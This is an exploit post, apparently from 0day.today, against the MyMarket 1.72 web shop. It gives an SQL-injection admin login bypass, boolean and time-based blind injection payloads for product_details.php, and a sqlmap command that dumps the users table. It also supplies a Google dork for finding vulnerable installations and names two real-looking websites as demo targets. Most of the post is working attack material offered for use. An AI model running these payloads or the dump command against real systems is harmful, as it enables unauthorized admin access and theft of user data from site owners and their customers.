MyMarket 1.72 bypass admin login & product_details blind sqli

# Exploit Title: MyMarket 1.72 bypass admin login & product_details blind sqli
# Google Dork: intext:"MyMarket version 1.71"
# Tested on: Linux
# Bug finder & Exploit Coder:NEt Bomber
# http://fb.me/net.bomba

Beside other sqli exploits found on exploits dbs (like 1337day) (which r not related to mine):

http://1337day.org/exploit/description/15360
http://1337day.org/exploit/description/3196

we can also add this admin bypass and sqli exploits :

1-Admin Bypass

login input is not well sanitized in login.php which can lead to to include some specials chars used to change SQL syntax so we can gain admin access becuz of priv=admin since first ID is submitted .

# Exploit :

Login: admin' OR 1=1#   ["#" is used to ignore what comes after (AND password=)]
Password : netbomber

talala u got admin access :) !

notice:sometimes u can get access with default login info (root,password).

2-sqli in product_details.php

becuz of load_product($qid) function which doesn't sanitize input before submitted to SQL query;

http://{target}/market/shopping/product_details.php?id={$id}'

w need a blind sqli injection for this :

using SQLMAP i got following types of blind injection with thier paylods :

Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6' AND 3417=3417 AND 'hYWx'='hYWx
Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=6' AND SLEEP(5) AND 'zMmr'='zMmr

i recommend to use SQLMAP for maximum threading to exploit it :) .

Command :
./sqlmap.py -u "http://{target}/market/shopping/product_details.php?id=$id" -D {database_name} -T users --dump --no-cast --threads 10

notice:this vuln can also be found in /search

#Demo :D

www.spiritsongpublishing.com/market/shopping/?id=3
http://websolu.net/mymarket/

# Done

#  0day.today [2018-04-13]  #